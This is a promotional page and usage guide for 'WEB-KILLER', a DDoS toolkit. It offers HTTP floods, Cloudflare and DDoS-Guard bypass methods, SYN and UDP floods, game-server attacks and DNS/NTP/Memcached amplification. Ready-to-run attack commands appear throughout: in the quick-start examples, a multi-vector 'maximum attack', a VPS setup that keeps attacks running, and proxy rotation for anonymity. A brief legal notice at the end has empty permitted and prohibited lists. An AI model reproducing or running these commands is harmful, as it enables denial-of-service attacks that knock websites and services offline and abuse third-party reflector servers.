🔥 v2.1 - Latest Release

WEB-KILLER

Ultimate DDoS Attack Toolkit for Security Professionals

57
Attack Methods
112K+
Max PPS
10+
Bypass Techniques
ALL
Platforms
🚀 Get Started 📚 Documentation

📖 About WEB-KILLER

A comprehensive network stress testing framework for authorized security assessments

🎯

Purpose Built

Designed for penetration testers, security researchers, and network administrators to test infrastructure resilience against DDoS attacks.

🔧

57 Attack Methods

Comprehensive arsenal covering Layer 7 (HTTP/HTTPS), Layer 4 (TCP/UDP), and amplification attacks.

🛡️

Defense Bypass

Advanced techniques to bypass Cloudflare, DDoS-Guard, AWS Shield, Akamai, and more.

🌐

Cross Platform

Fully supported on Windows, Linux, macOS, and Android (Termux). Run anywhere.

📊

Real-time Analytics

Live PPS, BPS, CPU, and RAM monitoring during attacks with 3D visualization.

🔒

Proxy System

Automatic proxy downloading, validation, and rotation with HTTP, SOCKS4, SOCKS5 support.

✨ Key Features

Everything you need for professional network stress testing

🌐

Layer 7 Attacks (26 Methods)

HTTP/HTTPS flood attacks including GET, POST, Cloudflare bypass, DDoS-Guard bypass, bot simulation, and more.

🔌

Layer 4 Attacks (21 Methods)

TCP/UDP/SYN/ICMP floods targeting servers, game services, and network infrastructure.

📡

Amplification (8 Methods)

DNS (54x), NTP (556x), Memcached (51,000x), CLDAP (70x) amplification attacks.

🎮

Game Server Support

Dedicated methods for Minecraft, FiveM, TeamSpeak 3, and Valve Source servers.

🛠️

Built-in Tools

Ping scanner, GeoIP lookup, network monitor, site checker, DNS resolver, and more.

🎨

Interactive Launcher

Beginner-friendly menu interface for easy attack configuration without memorizing commands.

💻 Installation Guide

Get WEB-KILLER running in minutes on any platform

Windows Installation

Install Python

winget install Python.Python.3.11

Or download from python.org

✅ Check "Add Python to PATH"

Install Git

winget install Git.Git

Clone Repository

cd Desktop
git clone https://github.com/Athexblackhat/WEB-KILLER.git
cd WEB-KILLER

Install & Run

pip install -r requirements.txt
python launcher.py

Linux Installation (Ubuntu/Debian)

# Update system sudo apt update && sudo apt upgrade -y # Install dependencies sudo apt install python3 python3-pip python3-dev git build-essential -y # Clone and install git clone https://github.com/Athexblackhat/WEB-KILLER.git cd WEB-KILLER pip3 install -r requirements.txt # Run python3 launcher.py

macOS Installation

# Install Homebrew /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" # Install Python & Git brew install python@3.11 git # Clone and install cd ~/Desktop git clone https://github.com/Athexblackhat/WEB-KILLER.git cd WEB-KILLER pip3 install -r requirements.txt # Run python3 launcher.py

Android (Termux) Installation

# Update packages pkg update && pkg upgrade -y # Install requirements pkg install python python-pip git -y # Clone and install git clone https://github.com/Athexblackhat/WEB-KILLER.git cd WEB-KILLER pip install -r requirements.txt # Run (non-RAW methods only) python run.py HELP

Cloud VPS Installation

# Connect via SSH ssh root@your-vps-ip # One-liner setup apt update && apt install python3 python3-pip git screen -y git clone https://github.com/Athexblackhat/WEB-KILLER.git cd WEB-KILLER pip3 install -r requirements.txt # Run in screen (keeps running after disconnect) screen -S attack python3 run.py GET http://target.com 0 1000 proxies.txt 100 3600 # Detach: Ctrl+A then D | Reattach: screen -r attack

🚀 Usage Guide

Complete tutorial on how to use WEB-KILLER effectively

📋 Command Structure

Attack Type Command Format
Layer 7 python run.py <method> <url> <proxy_type> <threads> <proxy_file> <rpc> <duration> [debug]
Layer 4 python run.py <method> <ip:port> <threads> <duration> [proxy_type] [proxy_file]
Amplification python run.py <method> <ip:port> <threads> <duration> <reflector_file> [debug]

🎯 Quick Start Examples

Basic GET Flood Attack
# Attack a website with GET flood # 500 threads, 50 requests per connection, 60 seconds python run.py GET http://example.com 0 500 proxies.txt 50 60

Breakdown:

  • GET - HTTP GET method
  • http://example.com - Target URL
  • 0 - Use all proxy types
  • 500 - Number of concurrent threads
  • proxies.txt - Proxy list file
  • 50 - Requests per connection (RPC)
  • 60 - Duration in seconds
Cloudflare Bypass Attack
# Bypass Cloudflare protection # Use SOCKS5 proxies, 800 threads, 10 minutes python run.py CFB https://protected-site.com 5 800 socks5.txt 80 600 debug

Tips:

  • Use CFB for standard Cloudflare
  • Use CFBUAM for Under Attack Mode
  • SOCKS5 proxies provide better anonymity
  • Add debug flag to see real-time stats
Minecraft Server Attack
# Minecraft Java Edition server python run.py MINECRAFT mc.server.com:25565 20 300 # Minecraft bot flood with login python run.py MCBOT play.server.com:25565 50 600 5 socks5.txt
DNS Amplification Attack
# DNS amplification (54x traffic amplification) # Requires reflector servers list python run.py DNS target.com:53 10 300 dns_reflectors.txt debug

⚠️ Important

Amplification attacks require a list of vulnerable reflector servers. These methods need RAW socket access (root/admin).

Multi-Vector Maximum Attack
# Terminal 1: Layer 7 HTTP/2 attack python run.py STOMP https://target.com 5 1000 socks5.txt 100 3600 & # Terminal 2: Layer 4 SYN flood (requires sudo) sudo python run.py SYN target.com:443 100 3600 & # Terminal 3: DNS amplification sudo python run.py DNS target.com:53 10 3600 dns_servers.txt & # Terminal 4: Monitor with DSTAT python run.py TOOLS

🎮 Interactive Launcher

# Launch the beginner-friendly menu python launcher.py # Menu Options: # [1] Layer7 Attack - Step-by-step HTTP configuration # [2] Layer4 Attack - TCP/UDP attack setup # [3] Amplification - AMP attack setup # [4] Tools Console - Network utilities # [5] View Help - Usage reference # [6] Stop All Attacks - Emergency stop

🔢 Proxy Types Reference

CodeTypeBest For
0ALLMaximum variety
1HTTPLayer 7 attacks
4SOCKS4TCP connections
5SOCKS5Best anonymity
6RANDOMAuto-selection

🎯 Attack Methods

Complete reference of all 57 attack methods

#MethodDescriptionBypassPower
1GETStandard HTTP GET flood⭐⭐⭐⭐⭐
2POSTHTTP POST with JSON payload⭐⭐⭐⭐⭐⭐
3HEADHTTP HEAD request flood⭐⭐
4CFBCloudflare bypass⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐
5CFBUAMCloudflare UAM bypass⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐
6BYPASSGeneral WAF bypass⭐⭐⭐⭐⭐⭐⭐⭐
7OVHOVH-specific attack⭐⭐⭐⭐⭐⭐⭐
8STRESSHigh-stress POST flood⭐⭐⭐⭐⭐⭐⭐
9DYNDynamic host attack⭐⭐⭐⭐⭐⭐⭐
10SLOWSlowloris-style attack⭐⭐⭐⭐⭐⭐
11NULLNull user agent attack⭐⭐⭐⭐⭐
12COOKIECookie manipulation⭐⭐⭐⭐⭐⭐
13PPSHigh packets per second⭐⭐⭐⭐⭐⭐⭐
14EVENEven connection attack⭐⭐⭐⭐⭐⭐
15GSBGoogle Safe Browsing⭐⭐⭐⭐⭐⭐
16DGBDDoS-Guard bypass⭐⭐⭐⭐⭐⭐⭐⭐⭐
17AVBAnti-virus bypass⭐⭐⭐⭐⭐⭐⭐
18APACHEApache Range attack⭐⭐⭐⭐⭐⭐⭐
19XMLRPCWordPress XML-RPC⭐⭐⭐⭐⭐⭐
20BOTSearch engine bot flood⭐⭐⭐⭐⭐⭐⭐
21BOMBHTTP/2 bombardier⭐⭐⭐⭐⭐⭐⭐⭐⭐
22DOWNLOADERSlow download attack⭐⭐⭐⭐⭐⭐
23KILLERProcess spawner⭐⭐⭐⭐⭐⭐⭐
24TORTor network attack⭐⭐⭐⭐⭐⭐⭐⭐
25RHEXRandom hex attack⭐⭐⭐⭐⭐⭐⭐⭐
26STOMPHTTP/2 stomp attack⭐⭐⭐⭐⭐⭐⭐⭐⭐⭐
#MethodProtocolDescription
1TCPTCPTCP connection flood
2UDPUDPUDP packet flood
3SYNTCPSYN packet flood (RAW socket)
4ICMPICMPPing flood (RAW socket)
5VSEUDPValve Source Engine query
6TS3UDPTeamSpeak 3 server flood
7MCPEUDPMinecraft PE flood
8FIVEMUDPFiveM server query
9FIVEM-TOKENUDPFiveM token attack
10MINECRAFTTCPMinecraft server flood
11MCBOTTCPMinecraft bot flood (with login)
12CONNECTIONTCPConnection flood
13CPSTCPConnections per second
14OVH-UDPUDPOVH UDP custom flood
#MethodPortAmplification Factor
1DNS5328-54x
2NTP123556x
3MEM1121110,000-51,000x
4CLDAP38956-70x
5CHAR19356x
6RDP338986x
7ARD328375x
#ToolTypeDescription
1PINGToolICMP ping utility
2CHECKToolWebsite status checker
3INFOToolGeoIP information lookup
4TSSRVToolTeamSpeak server lookup
5DNSToolDNS resolution tool
6CFIPToolCloudflare IP resolver
7DSTATToolNetwork statistics monitor

📚 Documentation

Complete reference documentation for WEB-KILLER

📖

Getting Started

Step-by-step guide for beginners. Learn how to install, configure, and launch your first attack.

Read Guide →
⚙️

Configuration

Detailed explanation of config.json, proxy providers, and advanced settings.

View Config →
🎯

Method Reference

Complete documentation of all 57 attack methods with parameters and examples.

View Methods →
🔧

Troubleshooting

Common issues and solutions. Fix installation problems, performance issues, and errors.

Get Help →

⚙️ Configuration File (config.json)

{ "proxy-providers": [ { "url": "https://api.proxyscrape.com/v2/?request=getproxies&protocol=http", "type": 1, "timeout": 30 }, { "url": "https://www.proxy-list.download/api/v1/get?type=socks5", "type": 5, "timeout": 30 } ], "MCBOT": "WEBKILLER_", "MINECRAFT_DEFAULT_PROTOCOL": 754 }

🔧 Troubleshooting Guide

❌ ModuleNotFoundError: No module named 'PyRoxy'
pip install --upgrade pip pip install -r requirements.txt # Or install directly: pip install git+https://github.com/MatrixTM/PyRoxy.git
❌ Permission Denied (RAW sockets)

Windows: Run CMD as Administrator

Linux/Mac: Use sudo

sudo python3 run.py SYN target.com:80 50 60
❌ Low Performance / Low PPS
  1. Increase thread count: --threads 1000
  2. Use premium proxies (SOCKS5)
  3. Close other applications
  4. Use wired connection instead of WiFi
  5. Reduce RPC value

⚠️ IMPORTANT LEGAL NOTICE

WEB-KILLER is designed EXCLUSIVELY for:


MUST NOT be used for:


Violators may face criminal prosecution under 18 U.S.C. § 1030 with up to 10 years imprisonment and $250,000 fines.